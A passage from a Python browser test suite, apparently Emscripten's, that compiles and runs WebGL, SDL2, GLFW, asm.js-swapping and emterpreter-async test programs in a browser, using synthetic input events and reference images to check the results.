self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
@no_wasm_backend('emterpretify')
def test_wget(self):
with open('test.txt', 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
@no_wasm_backend('emterpretify')
def test_wget_data(self):
with open('test.txt', 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@flaky
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1', timeout=30)
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
@no_wasm_backend('emterpretify')
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3', '--pre-js', 'pre.js', ])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
@no_wasm_backend('emterpretify')
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
@no_wasm_backend('emterpretify')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@no_wasm_backend('emterpretify')
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
@no_wasm_backend('emterpretify')
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
@no_wasm_backend('emterpretify')
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
@no_wasm_backend('emterpretify')
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
